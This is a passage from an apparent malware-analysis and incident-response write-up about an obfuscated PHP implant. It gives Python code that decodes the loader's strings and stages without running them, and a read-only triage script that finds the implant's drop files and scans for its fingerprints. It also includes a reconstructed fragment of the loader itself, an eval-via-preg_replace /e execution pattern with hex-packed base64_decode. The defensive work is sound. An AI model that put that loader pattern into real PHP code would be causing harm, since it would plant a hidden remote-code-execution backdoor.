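    """Map every call site to its cleartext, i.e. the substitutions made by hand above."""
    return {site: decode_slice(blob, *site) for site in sites}


def unwrap_stage(b64text: str) -> bytes:
    """Undo eval(gzuncompress(base64_decode(...))) without the eval.

    gzuncompress() is zlib (RFC 1950) inflate, so zlib.decompress yields the
    next PHP stage as text to read, not to run.
    """
    return zlib.decompress(base64.b64decode(b64text))


# Constructed stand-in for the missing I11lIl1I(507, 2862) payload: a tiny
# stage wrapped the same way the loader wraps its real stage-2 code.
SAMPLE_STAGE = base64.b64encode(zlib.compress(b"<?php echo 'next stage'; ?>")).decode()


if __name__ == "__main__":
    print(hex_packed_name("6261736536345f6465636f6465"))  # base64_decode
    for site, text in string_table().items():
        print(f"I11lIl1I{site} -> {text!r}")
    print(unwrap_stage(SAMPLE_STAGE).decode())
```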
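An added incident-response helper in Python (not part of the answer) for the "Further Debugging" section above: it derives the same .<hash> and .<hash>.log names the implant uses from the Host header, checks the implant's own temp-directory list read-only, and greps PHP sources for the loader's static fingerprints. Assumptions: PHP_OS is "Linux", and upload_tmp_dir from php.ini is not read here and has to be appended to the directory list by hand.

```python
"""Read-only triage for the w3net implant: drop-file names, temp dirs, fingerprints."""
import hashlib
import os
import re

# Values recovered in the analysis above.
VERSION2 = "3.01"
SALT = "QQ0OQ000000Q0OQ0Q"

# Static fingerprints of the loader as posted: the version banner comment,
# the obfuscated decoder name, the hex-packed "base64_decode" (optionally
# split with '.' as in the sample) and a "/.../e" pattern literal, i.e. the
# eval modifier of preg_replace that fires the payload. The last one is a
# heuristic and can match legitimate code; treat hits as leads, not proof.
LOADER_PATTERNS = {
    "versio_banner": re.compile(r"/\*versio:\d+\.\d+\*/"),
    "decoder_name": re.compile(r"I11lIl1I"),
    "hex_base64_decode": re.compile(r"6261736536345f6465636f(?:'\s*\.\s*')?6465"),
    "regex_e_modifier": re.compile(r"""["']/[^"'\n]+/e["']"""),
}


def implant_hash(http_host: str, scheme: str, php_os: str = "Linux") -> str:
    """md5($host.PHP_OS.$version2.salt) with $host = scheme + lowercased Host header."""
    host = scheme + http_host.lower()
    return hashlib.md5((host + php_os + VERSION2 + SALT).encode()).hexdigest()


def candidate_hashes(http_host: str, php_os: str = "Linux") -> list:
    """Both hashes one vhost can yield, since the scheme is part of $host."""
    return [implant_hash(http_host, s, php_os) for s in ("http://", "https://")]


def candidate_dirs(webroot: str) -> list:
    """The search list of get_temp_directory(), in the implant's own order.

    The implant's fallback is the infected script's own directory; pass that
    (or the web root) as `webroot`. upload_tmp_dir from php.ini is not
    readable here; append it by hand.
    """
    env = os.environ
    dirs = ["/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix",
            env.get("TMP"), env.get("TEMP"), env.get("TMPDIR"), "/tmp",
            os.path.join(webroot, "tmp"),
            os.path.join(webroot, "wp-content/uploads"),
            os.path.join(webroot, "wp-content/cache"),
            webroot]
    return [d for d in dirs if d]


def find_drop_files(dirs: list, hashes: list, exists=os.path.isfile) -> list:
    """Paths of existing '.<hash>' payload files and '.<hash>.log' crawler logs.

    The implant touch()es and include()s these; this function only stats them.
    `exists` is injectable so the logic can be exercised without a filesystem.
    """
    hits = []
    for d in dirs:
        for h in hashes:
            for name in ("." + h, "." + h + ".log"):
                path = os.path.join(d, name)
                if exists(path):
                    hits.append(path)
    return hits


def scan_php_source(source: str) -> list:
    """Names of the loader fingerprints found in one PHP file's text."""
    return [name for name, rx in LOADER_PATTERNS.items() if rx.search(source)]


def scan_tree(webroot: str) -> dict:
    """Walk the web root and report fingerprint hits per .php file."""
    report = {}
    for dirpath, _, files in os.walk(webroot):
        for fn in files:
            if fn.endswith(".php"):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_php_source(fh.read())
                if hits:
                    report[path] = hits
    return report


# Constructed sample: the opening of the loader as posted, blob shortened.
LOADER_SAMPLE = (
    "/*versio:3.01*/$II11=110426;if (!function_exists('I11lIl1I')){"
    "$GLOBALS['II11'] = '!aW5pX3NldA$_v...';"
    "function I11lIl1I($a, $b){$c=$GLOBALS['II11']; "
    "$d=pack('H*','6261736536345f6465636f'.'6465'); return $d(substr($c, $a, $b));};"
    "$QO0000QQ0 = I11lIl1I(3374, 16);"
    '$QO0000QQ0("/Q0QO00QOO/e", I11lIl1I(507, 2862), "Q0QO00QOO");};'
)


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    host = sys.argv[2] if len(sys.argv) > 2 else "www.example.com"
    print("drop files:", find_drop_files(candidate_dirs(root), candidate_hashes(host)))
    print("fingerprint hits:", scan_tree(root))
```

Run it as `python3 triage.py /var/www/html www.yourhost.example` on the infected server; every reported drop file should be copied for analysis before anything is cleaned up.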
